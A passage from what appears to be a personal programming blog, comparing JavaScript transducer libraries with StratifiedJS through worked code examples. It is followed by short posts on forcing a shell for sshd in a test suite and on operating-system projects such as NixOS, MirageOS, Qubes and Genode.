To expand on the last point above about complexity - sometimes this won’t matter. If you just use t.map and friends, you can largely ignore the complexity as an implementation detail. But if you get into more complex transducers, you may well be baffled by their failure to do what you expect, and figuring out why can be difficult. This happened to me plenty of times when coming up with these examples, and they aren’t even that complex.

So what are transducers?

From what I’d read they seemed mostly like a way of representing map, filter and reduce style operations as an object which can be applied later. They do this by encapsulating three functions - init, step and result. To make matters harder to wrap your head around, transducers don’t directly do things to a collection - they wrap another transducer. Rather than go into the theory and implementation of individual transducers, I’m going to focus on how they’re used, and by extension when they are useful.

Here’s an example of a map transducer, which can be used to build a copy of a sequence with each element incremented by 1.

var addOneToEverything = t.map(function(x) { return x + 1; });
var result = t.into([], addOneToEverything, someSequence);

But that’s not a very useful example, because it doesn’t gain you anything. After all, it’s trivial to store and reuse a mapping function already:

var addOne = function(x) { return x + 1 };
var result = someSequence.map(addOne);

If you really don’t want to remember that addOne should be applied with map (and not filter or reduce), you could always wrap it further:

var addOneToEverything = function(seq) {
  return seq.map(function(x) { return x + 1 });
}
var result = addOneToEverything(someSequence);

Another stated strength of transducers is that they compose easily - you can build a chained transducer with:

var chain = t.compose(addOneToEverything, filterOutEvenNumbers);

..but I can compose functions, too:

var result = filterOutEvenNumbers(addOneToEverything(items));

There are definite downsides to this approach:

it builds intermediate arrays - if you apply multiple transformations you’ll be building an intermediate array for each one
it only works for synchronous transformations - you need an entirely different API to deal with async map functions
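To make the first downside concrete, here is a small sketch in plain JavaScript (no transducer library involved). The names addOne and isOdd are just illustrative; the point is only that chaining array methods allocates an array per step, while a single pass does not.

```javascript
var items = [1, 2, 3, 4, 5];
var addOne = function(x) { return x + 1; };
var isOdd = function(x) { return x % 2 === 1; };

// Chained array methods: `map` allocates a full intermediate array
// before `filter` allocates the final one.
var chained = items.map(addOne).filter(isOdd);

// Single pass: each item goes through both steps before we move on,
// so the only array that gets built is the result.
var singlePass = items.reduce(function(result, x) {
  var y = addOne(x);
  if (isOdd(y)) result.push(y);
  return result;
}, []);

console.log(chained);    // => [ 3, 5 ]
console.log(singlePass); // => [ 3, 5 ]
```

The single-pass version is what you'd like to get without having to fuse the steps by hand, which is roughly the itch that transducers scratch.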

I’ve also heard that a big benefit of transducers is that they don’t have to know what kind of sequence you’re dealing with. I don’t really buy that, since this is all just duck typing - whatever sequence type you have, as long as it has a map function, you’re set. Whether it’s an object, or an array, or some custom iterator type, addOneToEverything doesn’t know or care.

The interesting thing is that the above downsides are really just limitations of the JavaScript language. I don’t know enough about clojure to know whether they are big issues there, but I do know plenty about StratifiedJS (I helped build it!) to know that it has neither of those problems.

Specifically, in StratifiedJS any expression can “suspend”, and the runtime will not evaluate something depending on that expression until its value is “ready”. It’s as if the language were smart enough to evaluate every single Promise expression automatically, so that instead of a promise you just see the eventual result. This isn’t exactly how it’s implemented, but conceptually it’s quite similar. And rather than managing concurrency using event-based callbacks, StratifiedJS introduces explicit concurrency syntax which provides structured (lexical) concurrency, rather than a tangle of events and callbacks which are hard to understand and reason about.

Let’s transduce some things!

So, let’s try and do a bunch of semi-complex things with transducers in JavaScript, and see how they compare to StratifiedJS, a superset of JavaScript with rich concurrency support.

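For the examples below, I’m using the following libraries: transduce, es6-promise, transduce-stream and object-stream (the same ones required in the prelude below).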

Not being up to scratch with the latest npm hotness, I wasn’t really sure which libraries to go with - there are seemingly endless variations on the name “transducers”, and more promise implementations than you can poke a stick at. But these are what I used, particularly because transduce has builtin support for async transducers, which doesn’t seem to be the case with some other libraries.

If you want to run an example, you can throw it in a .js file after the following prelude:

#!/usr/bin/env node
var t = require('transduce');
var Promise = require('es6-promise').Promise;
var TransduceStream = require('transduce-stream');
var ObjectStream = require('object-stream');
var EventEmitter = require('events').EventEmitter;

If you want to run the StratifiedJS examples, you just need to add this to the top: (you’ll obviously need StratifiedJS installed, too)

#!/usr/bin/env sjs
@ = require('sjs:std');

Example 1: nested map / filter / groupBy

To pick a random sequence processing task, let’s try to:

1) group sequential elements in a stream based on whether they’re even or odd
2) sum up each group
3) report only the sums which are divisible by 3

It’s a bit arbitrary, but it includes a bunch of transformations which need to be chained. Here’s how I’d do it in StratifiedJS:

var items = [1, 2, 4, 12, 8, 3, 13, 5, 6, 7];
var sum = items -> items .. @reduce(0, (a,b) -> a + b);
items = items .. @groupBy(x -> x%2)
  .. @transform(([key, items]) -> items) // ignore the `key`
  .. @transform(sum)
  .. @filter(x -> x%3 === 0)
  .. @toArray();
console.log(items);

// => [ 21, 6 ]

Aside: StratifiedJS primer

I don’t expect you to be familiar with StratifiedJS for these examples, but the intent is that (glossing over syntactic details) they should be fairly readable. StratifiedJS is a superset of JavaScript - most of the syntax is just JavaScript. But here’s a primer on the StratifiedJS-only features I’ll be using:

@foo by convention denotes a standard library function called foo.
transform is a lazy version of map - i.e. it produces a lazy stream rather than an array.
someFunc() .. anotherFunc() is like a pipeline. You don’t really need to know the details, other than it’s just function application which reads from left-to-right. It’s a lot like how composition works in a unix pipeline (cat foo | grep bar | wc -l).
a -> b is a lambda function, equivalent to function(a) { return b; }

So hopefully the above example is pretty straightforward - we’ve chained / composed transform, groupBy, filter using simple function application. Since we’re using transform (a lazy version of map), the transformations will be applied only as necessary - we won’t build up an array for each intermediate step.

Here’s what the equivalent code looks like with transducers:

var items = [1, 2, 4, 12, 8, 3, 13, 5, 6, 7];
var sum = {
  "@@transducer/init": function() { 
    return 0;
  },
  "@@transducer/result": function(result) { 
    return result;
  },
  "@@transducer/step": function(result, input) {
    return result + input;
  }
};

var transducer = t.compose(
  t.partitionBy(function(x) { return x%2; }),
  t.map(function(items) { return t.reduce(sum, items); }),
  t.filter(function(x) { return x%3 === 0; })
);
items = t.into([], transducer, items);
console.log(items);

// => [ 21, 6 ]

Not too bad, transducers. The glaring weirdness is that I had to implement sum myself as a (very boring) raw transformation object. I really expected that I’d be able to build a transducer from the kind of function you’d pass to reduce(), but I couldn’t figure out how. I’ll update this if someone enlightens me. But in terms of actually composing the transducers, it reads just like my StratifiedJS pipeline. And unlike a regular JavaScript pipeline, it won’t construct intermediate arrays either.
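For what it's worth, the boilerplate can be hidden behind a small helper of your own. The sketch below is not part of the transduce library (transformationFrom and runTransformation are names I've invented here); it only relies on the three "@@transducer/..." method names shown above, and uses a tiny stand-in loop so it runs without any dependencies.

```javascript
// Hypothetical helper (not part of any library): wrap an initial value and a
// reduce()-style function in the three-method transformation protocol.
function transformationFrom(initial, stepFn) {
  return {
    "@@transducer/init": function() { return initial; },
    "@@transducer/result": function(result) { return result; },
    "@@transducer/step": stepFn
  };
}

var sum = transformationFrom(0, function(a, b) { return a + b; });

// Minimal stand-in for a library's reduce, just to exercise `sum`:
function runTransformation(xf, items) {
  var result = xf["@@transducer/init"]();
  items.forEach(function(item) {
    result = xf["@@transducer/step"](result, item);
  });
  return xf["@@transducer/result"](result);
}

console.log(runTransformation(sum, [2, 4, 12, 8])); // => 26
```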

Also note that sum is not a transducer - it’s a transformation. A transformation is like the “base” form of a transducer, while a transducer is actually a function which takes a transformation and returns a new transformation. This wasn’t explained terribly well in the documentation, and it feels a little odd since transducers are what all the fuss is about, while transformations are clearly important too.
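The distinction is easier to see with both pieces written out by hand. This is a dependency-free sketch rather than the library's implementation: appendToArray is a transformation, and mapping (a hypothetical stand-in for a library's map) returns a transducer, i.e. a function from one transformation to another.

```javascript
// A transformation: knows how to start, add one item, and finish.
var appendToArray = {
  "@@transducer/init": function() { return []; },
  "@@transducer/step": function(result, input) { result.push(input); return result; },
  "@@transducer/result": function(result) { return result; }
};

// A transducer: takes a transformation, returns a new transformation.
// `mapping` is a hypothetical hand-written stand-in for a library's map.
function mapping(fn) {
  return function(xf) {
    return {
      "@@transducer/init": function() { return xf["@@transducer/init"](); },
      "@@transducer/step": function(result, input) {
        // transform the input, then hand it to the wrapped transformation
        return xf["@@transducer/step"](result, fn(input));
      },
      "@@transducer/result": function(result) { return xf["@@transducer/result"](result); }
    };
  };
}

var addOneThenAppend = mapping(function(x) { return x + 1; })(appendToArray);

var result = addOneThenAppend["@@transducer/init"]();
[1, 2, 3].forEach(function(item) {
  result = addOneThenAppend["@@transducer/step"](result, item);
});
console.log(addOneThenAppend["@@transducer/result"](result)); // => [ 2, 3, 4 ]
```

Nothing happens until the transducer is given a "base" transformation to wrap, which is why transformations matter even though transducers get all the attention.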

Example 2: … but what about async?

It’s not a proper JavaScript example without an asynchronous spanner thrown in the works. The transduce npm module I chose has support for async transformations, so how do you use it?

var items = [1,2,3];
var plusOne = t.map(function(x) { return x + 1 });
var plusOneSlowly = t.map(function(item) {
  return new Promise(function(resolve, reject) {
    setTimeout(function() {
      resolve(item + 1);
    }, 100);
  });
});
var transducer = t.compose(plusOneSlowly, t.async.defer(), plusOne);
t.async.into([], transducer, items).then(function(items) {
  console.log(items);
});

// => [ 3, 4, 5 ]

OK, so that was actually pretty decent. We were able to combine a sync (plusOne) and an async (plusOneSlowly) transducer in the same pipeline. The changes were just:

use t.async.into (which returns a promise) instead of t.into
insert a t.async.defer() after each asynchronous transducer in the arguments to compose

The latter was a little confusing - originally I assumed I needed to wrap each async transducer, as in t.async.defer(plusOneSlowly). But when I did that, my transformation was completely ignored. So that was pretty alarming. It’s my fault for not reading the docs clearly enough, but it seems a bit counterintuitive. Now that I know how transducers work it actually makes a little more sense, because defer is nothing special - it’s just a transducer which resolves promises into their values. But it threw me off for a while.
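The "resolve promises into values before the next step sees them" idea can be sketched without any library. To be clear, this is not how transduce implements defer or async.into; asyncInto is a hypothetical helper that just pushes items through a promise-returning step one at a time.

```javascript
// Hypothetical stand-in for an async `into`: feed items through `step` one at
// a time, waiting for each promise to resolve before moving on.
function asyncInto(dest, step, items) {
  return items.reduce(function(pending, item) {
    return pending.then(function() {
      return step(item);
    }).then(function(value) {
      dest.push(value);
    });
  }, Promise.resolve()).then(function() {
    return dest;
  });
}

var plusOneSlowly = function(x) {
  return new Promise(function(resolve) {
    setTimeout(function() { resolve(x + 1); }, 10);
  });
};
var plusOne = function(x) { return x + 1; };

// plusOneSlowly returns a promise; the `.then` plays the role of "defer",
// turning it back into a plain value before the sync step sees it.
var done = asyncInto([], function(x) {
  return plusOneSlowly(x).then(plusOne);
}, [1, 2, 3]);

done.then(function(items) {
  console.log(items); // => [ 3, 4, 5 ]
});
```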

For comparison, here’s how it would look in StratifiedJS:

var items = [1,2,3];
console.log(items
  .. @transform(x -> x + 1)
  .. @transform(function(x) {
      hold(100); // builtin function which suspends for `n` milliseconds
      return x + 1;
    })
  .. @toArray());

// => [ 3, 4, 5 ]

StratifiedJS has no real need for promises - any expression can “suspend” and you get the benefits of sequential semantics combined with the performance of async code. So this was always going to knock JavaScript out of the park, which goes to show that sometimes a critical feature in one language might not be all that useful elsewhere.

Example 3: lazily reading lines from a file

This one is probably the most complex, but it’s a practical, real-world application.

One thing I’ve noticed with nodejs streams is that doing anything truly custom is a massive pain - you basically have to implement a DuplexStream and deal with all the intricacies of the Stream interface yourself. As an example, here’s the 100+ line implementation of byline, which implements the process I’m about to describe. So it’s a very low bar that transducers will need to beat here ;)

The main complexity here is that we read streams in “chunks”, and emit “lines” - each chunk may contain any number of lines, and we need state to track the part of the most recent line we’ve seen. So each time we see a chunk from the source, we’ll have zero or more lines to emit.
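Stripped of any stream machinery, that bookkeeping looks something like the sketch below. LineSplitter is a hypothetical helper written for this illustration (plain JavaScript, no libraries): push returns whatever complete lines a chunk produced, and flush returns the trailing partial line once the input is finished.

```javascript
// Hypothetical helper: a stateful splitter. `push(chunk)` returns the lines
// completed by this chunk; `flush()` returns the trailing partial line.
function LineSplitter() {
  var current = ''; // partial contents of the line in progress
  return {
    push: function(chunk) {
      current += chunk;
      var lines = current.split('\n');
      current = lines.pop(); // last piece is incomplete (or '')
      return lines;
    },
    flush: function() {
      var rest = current;
      current = '';
      return rest === '' ? [] : [rest];
    }
  };
}

var splitter = LineSplitter();
var chunks = ['I am the first', ' line\n..and I am the second\n ...', ' third!'];
var lines = [];
chunks.forEach(function(chunk) {
  lines = lines.concat(splitter.push(chunk));
});
lines = lines.concat(splitter.flush());
console.log(lines);
// => [ 'I am the first line', '..and I am the second', ' ... third!' ]
```

Both implementations below follow the same shape: accumulate, split, keep the last piece as the new buffer, and emit the rest.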

Here’s how I do it in StratifiedJS:

// Fake `chunks` stream - we use the same `Stream` interface for
// real nodeJS streams, so this isn't cheating.
var fileChunks = @Stream(function(emit) {
  var chunks = [
    'I am the first',
    ' line\n..and I am the second\n ...',
    ' third!'
  ];
  chunks .. @each {|chunk|
    hold(100);
    emit(chunk);
  };
});

// This accepts a "chunk" stream and returns a "line" stream.
// Both streams are lazy - the next chunk won't be read until it's required
var linesOfStream = function(stream) {
  return @Stream(function(emit) {
    // buffer any partial contents of the current line
    var current = '';
    // iterate over chunks
    stream .. @each {|chunk|
      current += chunk;
      var lines = current.split('\n');
      current = lines.pop();
      // when we have any full lines, emit them
      lines .. @each(emit);
    }
    // emit the last line, if any
    if(current != '') emit(current);
  });
};

// Collect the (lazy) stream into an array and just log it
console.log(fileChunks
  .. linesOfStream
  .. @transform(x -> x + "!")
  .. @toArray());

// => [ 'I am the first line!', '..and I am the second!', ' ... third!!' ]

..and here’s how you can do it with a JavaScript transducer:

var chunks = [
  'I am the first',
  ' line\n..and I am the second\n ...',
  ' third!'
];

// make a nodejs stream (with an artificial delay between each chunk)
var fileChunks = ObjectStream.fromArray(chunks).pipe(
  ObjectStream.map(function(item, done) {
    setTimeout(function() { done(null, item); }, 10);
  })
);

// The `Lines` transducer accepts chunks from the source, and
// emits lines into the downstream transducer:
var Lines = function(xf) {
  var current = '';
  return {
    "@@transducer/init": function() { 
      return xf["@@transducer/init"](); 
    },
    "@@transducer/result": function(result) { 
      result = xf["@@transducer/step"](result, current); 
      if (t.isReduced(result)) {
        return t.unreduced(result);
      }
      return xf["@@transducer/result"](result); 
    },
    "@@transducer/step": function(result, input) {
      input = input.toString('utf-8');
      current += input;
      var lines = current.split('\n');
      current = lines.pop();
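      // use a plain loop so that we can actually stop early:
      // a `return` inside forEach() would only exit the callback
      for (var i = 0; i < lines.length; i++) {
        result = xf["@@transducer/step"](result, lines[i]); 
        if (t.isReduced(result)) {
          return result; // pass the reduced marker up so the source stops too
        }
      }
      return result;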
    }
  };
};

var transducer = t.compose(Lines, t.map(function(x) { return x + '!'; }));
var lineStream = fileChunks.pipe(TransduceStream(transducer));

lineStream.on('data', function(d) {
  console.log('Line:', d.toString('utf-8'));
})
lineStream.on('end', function() {
  console.log('Done');
});

// =>
// Line: I am the first line!
// Line: ..and I am the second!
// Line:  ... third!!
// Done

So that’s quite a bit longer, but it’s actually not too bad, considering the alternative (implementing this directly as a NodeJS stream transformation). Plus, you could use the same transducer on arrays / event emitters which for some reason spit out chunks instead of lines.

One thing that complicates this is that we have to take care to handle “early return” values, which are named “reduced” values. I’m not sold on the name (perhaps “terminator” would be better), but it forces us to check for them in various places since our transducer doesn’t just have a one-to-one (or one-to-zero) mapping between input and output items.
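The mechanism itself is simple enough to show in isolation. This is a hand-rolled sketch, not the library's code: Reduced, reduced, isReduced and reduceUntilReduced are minimal hypothetical versions, just enough to show a step function signalling "stop feeding me input".

```javascript
// Hypothetical minimal versions of the "reduced" helpers.
function Reduced(value) { this.value = value; }
function reduced(value) { return new Reduced(value); }
function isReduced(x) { return x instanceof Reduced; }

// A reduce loop that stops as soon as a step returns a reduced value.
function reduceUntilReduced(step, init, items) {
  var result = init;
  for (var i = 0; i < items.length; i++) {
    result = step(result, items[i]);
    if (isReduced(result)) return result.value; // unwrap and stop early
  }
  return result;
}

var seen = 0;
// Collect items, but signal "I'm done" once we have three of them.
var firstThree = reduceUntilReduced(function(acc, x) {
  seen++;
  acc.push(x);
  return acc.length === 3 ? reduced(acc) : acc;
}, [], [10, 20, 30, 40, 50]);

console.log(firstThree, seen); // => [ 10, 20, 30 ] 3
```

A transducer which emits several outputs per input has to perform that isReduced check after every downstream step, which is where the extra noise comes from.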

Also, I couldn’t find a good way to tell the stream machinery to leave my strings alone - I kept receiving them (in both the step function and the output data items) as Buffer objects. Maybe I missed it in the API, or maybe it just needs to be added. It’s not a big deal, but it feels hacky and unnecessary.

I originally thought this was one transformation that couldn’t be expressed as a simple reduce in StratifiedJS, because you need to keep track of two accumulators - the lines so far, as well as the current (partial) line buffer. But I realised you actually can, if you simply treat the “last line” as the buffer. This does mean you can’t omit the blank line at the end if your file ends with a newline. It also feels a little hacky to mutate the result during each step, but it is pleasantly concise:

var lines = fileChunks .. @reduce([''], function(lines, chunk) {
  var current = lines.pop();
  current += chunk;
  current.split('\n') .. @each(line -> lines.push(line));
  // return the accumulator; its last element is the partial-line buffer
  return lines;
});

Example 4: event streams

The last thing I thought I’d try was an event stream, because those can also be useful to process as a sequence (but unlike streams, you can’t tell your emitter to slow down - you just have to deal with events as they happen).

var transducer = t.compose(
  t.map(function(x) { return x+1; }),
  t.async.delay(1000),
  t.async.defer(),
  t.take(5)
);
var source = new EventEmitter();
var receiver = new EventEmitter();

var result = t.async.emitInto(receiver, transducer, source);

// kick off an infinite set of `source` events
var timeout;
var spawn = function() {
  var count = 0;
  return function() {
    timeout = setTimeout(function() {
      timeout = null;
      source.emit('data', count++);
      spawn();
    }, 500);
  };
}();
spawn();

receiver.on('data', function(data) {
  console.log("Data:", data);
});

receiver.on('end', function() {
  console.log("Done");
  if(timeout != null) clearTimeout(timeout);
});

// =>
// Data: 1
// Data: 2
// Data: 3
// Data: 4
// Data: 5
// ( ... program never terminates)

This one is a complete failure.

Note that I explicitly added code to deal with shutting down the emitter, which the documentation implied I would see after the take(5) had caused the transducer to finish prematurely. But it never stopped, nor was the underlying listener removed from source - if I insert a console.log you can see that the map step still gets called forever with new values, but its results just get ignored. And given that I never actually see an end event, it’s actually impossible to see when my transducer has “finished”. If anyone knows how to do this right, I’d be interested to know it.
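For reference, the behaviour I was expecting is easy to write by hand with Node's EventEmitter. This sketch doesn't use the transduce library at all, and takeEvents is a hypothetical helper; it forwards the first n events, removes its listener from the source, and emits end on the receiver.

```javascript
var EventEmitter = require('events').EventEmitter;

// Hypothetical helper: forward the first `n` 'data' events from `source` to
// `receiver`, then detach from `source` and emit 'end' on `receiver`.
// Assumes n >= 1.
function takeEvents(n, source, receiver) {
  var remaining = n;
  function onData(value) {
    remaining--;
    receiver.emit('data', value);
    if (remaining === 0) {
      source.removeListener('data', onData);
      receiver.emit('end');
    }
  }
  source.on('data', onData);
}

var source = new EventEmitter();
var receiver = new EventEmitter();
var received = [];
var ended = false;
receiver.on('data', function(x) { received.push(x); });
receiver.on('end', function() { ended = true; });

takeEvents(3, source, receiver);
for (var i = 0; i < 10; i++) source.emit('data', i);

console.log(received, ended, source.listenerCount('data'));
// => [ 0, 1, 2 ] true 0
```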

Extra credit: streams & async processing

Even though streams are inherently asynchronous, I could find no way to properly apply an asynchronous transducer to my Lines stream. I tried, with:

var transducer = t.compose(Lines, t.async.delay(1000), t.async.defer());

… but as soon as the lines were all done being emitted, the output stream saw end() - any promises which had not resolved were simply dropped. That’s very bad, especially since whether or not it “works” is based on the speed of your input stream, so it could appear to work 95% of the time but silently do the wrong thing when your system is under load.

I don’t count this (or the previous example) as an inherent ding against transducers, though - it seems like this is probably just a bug in the transduce-stream library.

Closing thoughts

If you haven’t read the tl;dr above, that summarises my thoughts pretty well. But it’s worth reiterating that using transducers in JavaScript is failure-prone and hard to figure out¹.

It’s really easy to abort your program with no indication of why - accidentally returning undefined from a function can short-circuit something, and instead of an error your program just halts prematurely. Not really a problem with transducers, but something to be aware of when using them in JavaScript. This is pretty much an occupational hazard with JavaScript though - a stray callback can silently ruin everything. I think I’ve been spoiled by using StratifiedJS for so long ;)
Also (probably the cause of some of the above), unhandled exceptions in my code would not get printed, the process would just exit silently. This is a terrible developer experience, but I don’t actually know which library is to blame. This is also just something that happens when you’re programming in JavaScript, sadly.

Appendix a: More examples

Feeling like I now grokked transducers, I figured I’d explore some more of their particular features. A lot of fuss is made of their ability to apply transformations to all sorts of collections, not just arrays. So let’s see how that looks, shall we?

“Mapping” the values of an object

var mapVal = function(fn) {
  return t.map(function(pair) {
    return [pair[0], fn(pair[1])];
  });
}

var src = {
  key1: 'val1',
  key2: 'val2',
  key3: 'val3',
};
var transducer = mapVal(function(x) {
  return x + '!';
});
var result = t.into({existing: 1}, transducer, src);
console.log(result);

// => { existing: 1, key1: 'val1!', key2: 'val2!', key3: 'val3!' }

I can’t really think of any situation where I’d need to transduce “into” a non-empty destination, but it is nevertheless quite neat.
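If you're wondering what is going on underneath mapVal and t.into, here is a rough sketch in plain JavaScript with no library involved. It assumes the usual definition of a transducer (a function from one reducing function to another); intoObject and assocPair are hypothetical names of my own, and this version only handles object-to-object, unlike the real t.into.

```javascript
// A transducer takes a reducing function and returns a new reducing function.
function map(fn) {
  return function(step) {
    return function(acc, item) {
      return step(acc, fn(item));
    };
  };
}

// Reducing function for plain objects: each item is a [key, value] pair.
function assocPair(obj, pair) {
  obj[pair[0]] = pair[1];
  return obj;
}

// Hypothetical stand-in for t.into(), handling only object -> object.
function intoObject(dest, transducer, src) {
  var step = transducer(assocPair);
  // copy dest, so the caller's object is not mutated
  var acc = Object.assign({}, dest);
  Object.keys(src).forEach(function(key) {
    acc = step(acc, [key, src[key]]);
  });
  return acc;
}

var bang = map(function(pair) {
  return [pair[0], pair[1] + '!'];
});
console.log(intoObject({existing: 1}, bang, {key1: 'val1', key2: 'val2'}));
```

The transducer itself never mentions objects. Only assocPair knows how to build the destination, which is why the same map could be reused to build an array or a stream instead.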

Custom iterators

// custom "infinite sequence from <n>" implementation
function Count(initial) {
  var rv = {};
  rv[t.protocols.iterator] = function() {
    return {
      _idx: initial,
      next: function() {
        var self = this;
        return {
          value: new Promise(function(resolve) {
            setTimeout(function() {
              resolve(self._idx++);
            }, 10);
          }),
        };
      },
    }
  };
  return rv;
}
var transducer = t.compose(
  t.map(function(x) { return x+1; }),
  t.async.delay(10),
  t.async.defer(),
  t.take(5)
);

t.async.into([], transducer, Count(10)).then(function(result) {
  console.log(result);
});

// => [ 11, 12, 13, 14, 15 ]

This is pretty neat - we take an infinite sequence starting from 10, add one to each element, and then just take the first five numbers of the result. Of course, this is also pretty trivial with StratifiedJS:

function Count(n) {
  return @Stream(function(emit) {
    while(true) {
      hold(10);
      emit(n++);
    }
  });
}
console.log(Count(10)
  .. @transform(x -> x + 1)
  .. @take(5)
  .. @toArray());

// => [ 11, 12, 13, 14, 15 ]
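For comparison, the same pipeline can be sketched with plain ES2015 generators and no library at all. This is a synchronous version only: it drops the 10ms delay between items, so it says nothing about the async behaviour discussed above. The helper names mapIter and take are my own.

```javascript
// Infinite synchronous sequence starting from n.
function* count(n) {
  while (true) yield n++;
}

// Lazily apply fn to each item.
function* mapIter(fn, iterable) {
  for (var x of iterable) yield fn(x);
}

// Yield at most `limit` items, then stop pulling from the source.
function* take(limit, iterable) {
  if (limit <= 0) return;
  var taken = 0;
  for (var x of iterable) {
    yield x;
    if (++taken >= limit) return;
  }
}

var firstFive = Array.from(
  take(5, mapIter(function(x) { return x + 1; }, count(10)))
);
console.log(firstFive);
```

Because generators are lazy, the infinite count(10) is only ever asked for the five items that take(5) needs.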

Fun fact:
null + 2 + 4 == 6, and
0 + 2 + 4 == 6, and
t.into(0, sum, [2, 4]) == 6, but
t.into(null, sum, [2, 4]) == 4
because apparently an initial value of null is a special signifier for “return the last value of the input sequence”, which didn’t seem to be documented anywhere. I’d never rely on sane behaviour from null + <number> in real code, but it had me scratching my head when I encountered it by accident. ↩

Force a specific shell for sshd

2015-04-24T00:00:00+10:00

I use fish-shell as my default shell on my own computer, because it’s a pretty nice shell.

Occasionally, though, this causes issues. Software tests in particular have a habit of sloppily running shell commands. Typically, this can be fixed by just being more explicit, using execvp(['bash', '-c', '<command>']) (or just using execv* directly instead of going through a shell).

But one case I couldn’t figure out is SSH. When you’re testing an SSH client, the most reliable way to do that is to run some shell scripts over a local SSH session, and check that it does what you expect. SSH has no way of passing a nice array of arguments, all you get is a string which will be interpreted by the user’s SHELL.
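Since all SSH gives you is a single string, a client that starts out with an array of arguments has to flatten it itself. A minimal sketch of that step, assuming the receiving shell follows POSIX single-quote rules (which is exactly the assumption that breaks down when the user's SHELL is something else); shellQuote and shellJoin are hypothetical helper names:

```javascript
// Quote one argument so a POSIX shell reads it back as a single literal word.
function shellQuote(arg) {
  // Close the quote, emit an escaped single quote, then reopen the quote.
  return "'" + String(arg).replace(/'/g, "'\\''") + "'";
}

// Flatten an argument array into one command string, as ssh requires.
function shellJoin(args) {
  return args.map(shellQuote).join(' ');
}

console.log(shellJoin(['echo', "it's", 'a b']));
```

Everything about this depends on the remote side parsing the string the way the client expects, which is why the tests need a known shell on the other end.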

If you want to use bash for an SSH command, many online resources will tell you to run “ssh bash ...”. But that won’t work for tests, which want to run real commands against a POSIX shell (including edge cases around argument parsing). Other suggestions include changing your default shell, but I don’t want to forsake my preferred shell just to appease some automated tests!

What you can do however, is funnel the whole shell string through to your desired shell using this slightly underhand sshd configuration:

ForceCommand sh -c 'eval "$SSH_ORIGINAL_COMMAND"'

This still requires a default shell that’s normal enough to not do any interpolation within single quotes, but that’s a much simpler requirement (and true of fish-shell).

For the Conductance test suite, we run an unprivileged sshd instance with its own checked-in config during testing, so applying this globally is fine. But if you are doing this on an actual SSH server, you might want to use a Match directive to make sure this rule only applies to trusted users (e.g. I haven’t tested how this works on a locked-down account with its shell set to /bin/nologin; it could conceivably create a security hole).

OS Technologies To Watch

2015-01-04T00:00:00+11:00

It’s the new year, and it seems to be a vibrant time for novel Operating System technologies. This is not intended to be an objective list of “the best things”, it’s just some up-and-coming technologies that I’m particularly excited about right now:

Nix / NixOS

I’ve known about nixos for a while, but not really had much cause to use it. This year, I started using nixos to deploy some cloud services. I have been completely blown away.

I had so much to say about NixOS that I turned it into its own post: NixOS and stateless deployment, so go read that if you’re interested. But to summarize, NixOS lets you define a computer’s complete OS and configuration, declaratively. Users. Files. Software (both official and your own). Configuration. Services. Disk mounts. Kernel drivers. Every friggin’ thing. It’s all specified in a pure, lazy, strongly typed declarative language with just enough power (functions, modules, etc) to allow all the abstractions you need, but which often reads just like a trivial configuration file.

And unlike puppet (which is declarative but impure and non-exhaustive), the promise of stateless declarative configuration actually holds true. Taking so much state out of deployment really is an incredible and liberating achievement. I honestly dread the next time I have cause to deploy something that isn’t NixOS.

But while NixOS is incredibly useful for development / deployment, it’s unlikely to be useful as a desktop OS. Eliminating state for a personal desktop machine is nowhere near as critical as it is for servers, and nix has a pretty poor desktop-specific package selection ~~(e.g still no Gnome3 packages)~~. Update (04/01/2015): Multiple people have pointed out that Gnome3 is packaged and works fine, so that was a bad example ;)

MirageOS

MirageOS is not your standard OS. A mirage binary is basically your application code statically linked against an OS kernel, as one big blob, called a “unikernel”.

This sounds like a crazy idea, but think about it. Many VMs these days on cloud providers run just one service, for isolation and other reasons. So you have the linux kernel, with a full multi-user multi-tasking stack, a host of installed services and only one job (your app). That’s hundreds of megabytes of code, before you even factor in your own software. The amount of incidental complexity you could avoid by cutting all of that out and just linking your app directly against a massively simpler kernel is pretty astounding.

Of course, a massively simpler system like this has limitations. MirageOS only runs OCaml code. You can’t run multiple processes (but you can use a cooperative event-loop library like lwt to perform concurrent tasks in the one process). You don’t even necessarily have a disk (but you can set one up if you need persistent storage).

But if your application can fit in that model, the benefits are pretty exciting. Your entire OS is stateless. Your deployment process is literally just stopping one VM and starting another. And that may sound expensive, but these unikernels are in the order of tens of kilobytes - they can start up quicker than a docker container. You get the benefits of OCaml’s excellent type system and memory safety across your entire OS (no buffer overflows), along with an incredibly small attack surface (no random binaries or C libraries that were written before the internet with the belief that there is no such thing as malicious input). If there’s one thing this year has taught me, it’s that just because code is old and widely used, doesn’t mean it can’t be terribly insecure.

Obviously, writing code in OCaml doesn’t implicitly fix security bugs (aside from memory safety bugs, which is nothing to sneeze at). But the most efficient and least buggy code is code which doesn’t exist, and MirageOS can effectively trim off decades of crusty code, if you can work within its fairly strict requirements. To be honest, I haven’t actually used it myself - I’m keen, but given the restrictions I haven’t yet had anything appropriate to try it out with.

And if OCaml isn’t your thing, there are unikernels in various stages of development for haskell, the JVM, erlang and go.

Qubes OS

The complete lack of isolation in everyday computing is incredibly alarming. I have many things that I do on and offline - programming, work, banking, playing with new programs and tools, building software, playing games. I would be much more comfortable if (for example) some fun little game I’m trying out were not given full access to my entire user account, which could fairly trivially compromise all of the above without actually needing to subvert any security measures. Obviously when trying out suspicious software I’ll do it in a VM or with an unprivileged user account, but that’s a lot of work, and is very inconvenient.

From what I’ve seen, Qubes could be a much more convenient approach to at least maintaining some walls between activities that clearly have no business interacting with each other (e.g online banking and playing games). On the downside, I believe it comes at a fairly hefty performance (particularly RAM) cost, doesn’t provide the 3D acceleration required for gaming, and doesn’t allow much choice when it comes to the window manager (I use gnome-shell with a tiling window plugin, while Qubes uses KDE which I don’t much care for). While criticizing the window manager of a security oriented OS is clearly missing the point, it’s still going to put me off using it as my primary OS.

So despite the fact that I haven’t used Qubes, I’m hopeful that one day it could be convenient (and efficient) enough to provide vastly better security than we currently put up with.

Genode

While Qubes is A Thing That Could Work Right Now (with some annoyances), Genode feels like a thing that could be truly amazing in a handful of years’ time. And once it is generally useful, it would hopefully supersede the current half-measures like Qubes’s VM-based separation (which is not a slight on Qubes; it’s clearly more practical right now).

